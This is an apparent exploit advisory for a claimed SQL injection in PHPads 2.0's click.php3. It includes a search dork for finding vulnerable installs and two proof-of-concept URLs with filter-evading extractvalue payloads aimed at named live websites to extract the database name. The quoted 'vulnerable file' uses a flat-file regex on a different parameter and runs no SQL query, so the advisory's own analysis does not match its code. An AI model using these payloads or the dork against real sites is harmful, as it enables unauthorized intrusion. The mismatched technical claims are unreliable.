PHPads 2.0 SQL Injection

PHPads version 2.0 based on Pixelledads version 1.0 suffers from a remote SQL injection vulnerability.


MD5 | ed156782c8d22bbaf7d1b4b95b26e341

[+] Sql Injection on PHPads Version 2.0 based on Pixelledads 1.0 by Nile Flores

[+] Date: 05/05/2019

[+] Risk: High

[+] CWE Number : CWE-89

[+] Author: Felipe Andrian Peixoto

[+] Vendor Homepage: https://blondish.net/

[+] Software Demo : https://github.com/blondishnet/PHPads/blob/master/readme.txt

[+] Contact: [email protected]

[+] Tested on: Windows 7 and Gnu/Linux

[+] Dork: inurl:"click.php3?bannerID="" // use your brain ;)

[+] Exploit :

http://host/patch//click.php3?bannerID= [SQL Injection]

[+] Vulnerable File :

<?php
$bannerAdsPath = './ads.dat';
require './ads.inc.php';
///////////////////////////////////////
// Don't Edit Anything Below This Line!
///////////////////////////////////////
for ($i = 0; $i < count($ads); $i++) {
if(ereg('^' .$_GET['id']. '\|\|', $ads[$i])) {
$data = explode('||', $ads[$i]);
if ($_SERVER['REMOTE_ADDR'] != $bannerAds['blockip']) {
$data[ PHPADS_ADELEMENT_CLICKTHRUS ]++;
}
$ads[$i] = join('||', $data);
break;
}
}
if (!$data[PHPADS_ADELEMENT_LINK_URI]) {
die();
}
writeads();
Header("Location: ". $data[PHPADS_ADELEMENT_LINK_URI]);
exit;
?>

[+] PoC :

http://www.workplace.ca/phpads/click.php3?bannerID=-1/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+-
http://www.guaratubaonline.com.br/phpAds/click.php3?bannerID=-1/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+-

[+] EOF

Related Posts